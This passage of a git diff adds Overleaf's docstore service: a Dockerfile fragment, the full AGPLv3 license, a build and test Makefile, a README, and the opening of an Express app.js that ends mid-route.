+COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/docstore/ /overleaf/services/docstore/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/docstore/LICENSE b/services/docstore/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/docstore/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. 
By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. 
Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. 
You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. 
+ + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. 
In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. 
If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). 
To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. 
+ + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. 
+ + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/docstore/Makefile b/services/docstore/Makefile new file mode 100644 index 0000000..6efd053 --- /dev/null +++ b/services/docstore/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. 
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = docstore +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! 
echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/docstore/README.md b/services/docstore/README.md new file mode 100644 index 0000000..09b27ac --- /dev/null +++ b/services/docstore/README.md @@ -0,0 +1,11 @@ +overleaf/docstore +=================== + +A CRUD API for storing and updating text documents in projects + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2014-2019. 
diff --git a/services/docstore/app.js b/services/docstore/app.js new file mode 100644 index 0000000..76659e8 --- /dev/null +++ b/services/docstore/app.js @@ -0,0 +1,132 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const Events = require('node:events') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const express = require('express') +const bodyParser = require('body-parser') +const { + celebrate: validate, + Joi, + errors: handleValidationErrors, +} = require('celebrate') +const { mongoClient } = require('./app/js/mongodb') +const Errors = require('./app/js/Errors') +const HttpController = require('./app/js/HttpController') + +Events.setMaxListeners(20) + +logger.initialize('docstore') +if (Metrics.event_loop != null) { + Metrics.event_loop.monitor(logger) +} +Metrics.leaked_sockets.monitor(logger) +Metrics.open_sockets.monitor() + +const app = express() + +app.use(Metrics.http.monitor(logger)) + +Metrics.injectMetricsRoute(app) + +app.param('project_id', function (req, res, next, projectId) { + if (projectId?.match(/^[0-9a-f]{24}$/)) { + next() + } else { + next(new Error('invalid project id')) + } +}) + +app.param('doc_id', function (req, res, next, docId) { + if (docId?.match(/^[0-9a-f]{24}$/)) { + next() + } else { + next(new Error('invalid doc id')) + } +}) + +app.get('/project/:project_id/doc-deleted', HttpController.getAllDeletedDocs) +app.get('/project/:project_id/doc', HttpController.getAllDocs) +app.get('/project/:project_id/ranges', 